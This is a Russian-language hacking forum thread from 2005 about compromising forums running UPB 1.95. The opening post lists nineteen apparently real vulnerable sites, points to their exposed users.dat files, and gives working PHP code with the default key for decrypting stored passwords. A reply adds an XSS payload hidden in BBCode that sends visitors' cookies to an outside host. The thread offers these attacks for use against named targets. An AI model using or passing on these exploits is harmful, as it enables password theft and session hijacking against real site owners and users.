Возможность захвата сайта с Powered by UPB Version : 1.95.

Discussion in 'Уязвимости' started by Егорыч+++, 9 Jan 2005.

  1. Егорыч+++

    Staff Member

    Joined:
    27 May 2002
    Messages:
    1,370
    Likes Received:
    856
    Reputations:
    20
    Данная уязвимость найдена на этих сайтах.

    http://www.johnnyhollow.com/forum
    http://www.laurenpowers.com/forums/
    http://lugaversa.altervista.org/forum
    http://www.avenueq.com/forum/
    http://forum.kyrenee.com
    http://www.fsjames.com/ultimate
    http://www.ohiospeedskatingtour.com/forum/
    http://sta.umbc.edu/orgs/sail/pages/forum
    http://www.mpcs.ryerson.ca/~research/
    http://www.primednr.com/upb/
    http://www.killerdwarfs.net/messageboard/
    http://www.stompchat.com/forum/
    http://www.yeclaserve.com/forum/
    http://users.aber.ac.uk/trc99/forum
    http://www.bus.sfu.ca/clubs/BASS/BAM
    http://waitz.dnsalias.org/upb/
    http://www.hunggakungfu.com/forum/
    http://www.diskusjonsforum.com
    http://www.trek.dp.ua/forum

    1) Файлы с пользователями можно смотреть. Например:

    http://www.johnnyhollow.com/forum/db/users.dat

    2) Пароли пользователя можно дешифровать . Ключ везде стоит по умолчанию.

    Функция дешифрования:

    <?
    $key="wdnyyjinffnruxezrkowkjmtqhvrxvolqqxokuofoqtneltaomowpkfvmmogbayankrnrhmbduzfmpctxiidweripxwglmwrmdscoqyijpkzqqzsuqapfkoshhrtfsssmcfzuffzsfxdwupkzvqnloubrvwzmsxjuoluhatqqyfbyfqonvaosminsxpjqebcuiqggccl";
    function t_decrypt($text, $key)
    {
    $crypt = "";
    for($i=0;$i<strlen($text);$i++)
    {
    $i_key = ord(substr($key, $i, 1));
    $i_text = ord(substr($text, $i, 1));
    $n_key = ord(substr($key, $i+1, 1));
    $i_crypt = $i_text + $n_key;
    $i_crypt = $i_crypt - $i_key;
    $crypt .= chr($i_crypt);
    }
    return $crypt;
    }


    $text="тут пароль для дешифрации";
    echo t_decrypt($text, $key);
    ?>
     
    #1 Егорыч+++, 9 Jan 2005
    Last edited: 9 Jan 2005
  2. max_pain89

    max_pain89 Eat `em UP!

    Joined:
    11 Dec 2004
    Messages:
    451
    Likes Received:
    140
    Reputations:
    146
    Ну а ещё XSS если послать сообщение вида
    HTML:
    [url=http://www.g.ru" x=` ]xxx[/url]` style=display:none;background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie) a="[url=http://www.ru]xxx"[/url]
     
Loading...